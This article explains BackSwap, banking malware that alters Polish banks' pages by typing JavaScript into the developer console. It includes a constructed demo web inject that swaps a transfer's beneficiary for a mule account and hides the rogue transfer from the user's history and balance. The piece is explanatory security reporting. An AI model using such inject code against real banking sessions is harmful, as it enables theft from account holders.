Researchers at security company ESET have discovered a new piece of malware, dubbed BackSwap, that uses an innovative trick to try to empty victims’ bank accounts.

Typically, banking malware injects itself into a user’s online banking session by modifying the web page before it is displayed in the browser, or by altering the transaction data before it is sent to the bank’s web server. This is done, for instance, to steal login credentials, to change the destination account of a transfer, and sometimes to hide the rogue transaction from the user’s view afterwards.

To perform this injection, malware usually relies on a technique called "hooking": it locates specific functions inside the browser’s code (the "hooks") and redirects them so that its own malicious code runs whenever the browser processes page content or network data. While effective, this technique has two downsides for malware authors. The first is that these hooks aren’t always easy to find, and they tend to change when a browser is updated, forcing the authors to update their malware regularly.

The second, more important downside is that security software explicitly looks for such hooking and often blocks it when detected, rendering the malware useless.

BackSwap, however, uses a completely different technique to modify web pages. Rather than hooking into the browser process, it takes the place of the user and enters into the browser the same commands a user would enter if they wanted to alter the page themselves.

In particular, the malware opens the browser’s developer console, a tool present in modern browsers that lets a user run JavaScript against the currently loaded page and change its content in place, and enters code that makes the required changes to the page. To avoid arousing the user’s suspicion, it does so while temporarily freezing the screen.
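The two paragraphs above describe what a web inject changes (the beneficiary account sent to the bank, and the account history shown to the user) and how BackSwap gets its code into the page (typed into the developer console). The following is an added illustration written for this article of what such console-injected code has to do once it runs inside the banking page; it is not BackSwap’s own script, and not any bank’s page. The field names, CSS selectors, account numbers and transaction history are all constructed for the demo.

```javascript
// Added example for this article: an illustration of what a BackSwap-style
// web inject does once it has been typed into the developer console and is
// running inside the banking page. Demo code, not BackSwap's script or any
// bank's page. Field names, selectors, account numbers and the transaction
// history are all constructed for the demo.

// Hypothetical attacker-controlled (mule) account, constructed for the demo.
const MULE_ACCOUNT = "PL00000000000000000000000001";

// Constructed account history, as the bank's page might render it.
const SAMPLE_HISTORY = [
  { id: 1, to: "PL11111111111111111111111111", amount: 100 },
  { id: 2, to: MULE_ACCOUNT, amount: 250 }, // the rogue transfer
  { id: 3, to: "PL22222222222222222222222222", amount: 50 },
];

// Manipulation 1: change the beneficiary in the data that leaves the browser,
// while leaving the caller's copy (what the user sees on screen) untouched.
function swapBeneficiary(fields, muleAccount) {
  const sent = Object.assign({}, fields);
  if (typeof sent.recipient_account === "string" &&
      sent.recipient_account !== muleAccount) {
    sent.recipient_account = muleAccount;
  }
  return sent;
}

// Manipulation 2: drop transfers to the mule account from the history listing
// and add their amounts back to the displayed balance, so the statement the
// user sees still adds up.
function scrubHistory(transactions, muleAccount, shownBalance) {
  let hidden = 0;
  const visible = transactions.filter((tx) => {
    if (tx.to === muleAccount) {
      hidden += tx.amount;
      return false;
    }
    return true;
  });
  return { visible, balance: shownBalance + hidden };
}

// Binding both manipulations to a live page. The selectors are assumed for
// the demo; a real inject is written against one bank's actual markup, which
// is the per-bank analysis work the article mentions.
function installInject(doc, muleAccount) {
  const form = doc.querySelector("form#transfer");
  if (form) {
    // The submit event fires before the browser serialises the form, so the
    // rewritten value is what gets POSTed to the bank.
    form.addEventListener("submit", () => {
      const input = form.querySelector("input[name=recipient_account]");
      const sent = swapBeneficiary({ recipient_account: input.value }, muleAccount);
      input.value = sent.recipient_account;
    });
  }
  const rows = Array.from(doc.querySelectorAll("table#history tr[data-to]"));
  for (const row of rows) {
    if (row.getAttribute("data-to") === muleAccount) row.style.display = "none";
  }
}

// In a browser, act on the real page; elsewhere, show the data-level effect.
if (typeof document !== "undefined") {
  installInject(document, MULE_ACCOUNT);
} else {
  const typed = { recipient_account: "PL33333333333333333333333333", amount: "250.00" };
  console.log("user sees:", typed);
  console.log("bank receives:", swapBeneficiary(typed, MULE_ACCOUNT));
  console.log("history shown:", scrubHistory(SAMPLE_HISTORY, MULE_ACCOUNT, 1750));
}
```

Nothing on the page can tell this script apart from the bank’s own: it runs in the page’s origin with the user’s authenticated session, after login and TLS have already done their job, which is why modifying the data "before it is sent to the bank’s web server" is enough. The bank’s server only ever sees the mule account, so the one thing that reliably exposes the swap is a confirmation of the beneficiary account delivered through a channel the browser does not control.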

BackSwap has been found targeting various Polish banks, but in an email, ESET researcher Michal Poslušný, who discovered the malware, said that while the authors clearly showed deep knowledge of the online banking systems of these Polish banks, there was nothing that would stop the same attack from working against other banks.

"They had to put a lot of time into analyzing each of the internet banking sites," Poslušný said. "From a technical point of view, the Polish banks are not any different than banks in other European countries."

It is thus an important lesson for anyone concerned with the security of online banking systems: malware authors keep finding new ways to reach the same data, and sometimes a simple yet innovative one gives them at least a temporary upper hand.


Martijn Grooten

Martijn Grooten is the current Editor of Virus Bulletin and is regularly quoted in the media as an expert on a wide range of aspects of cyber security, from malware to cryptography to email security.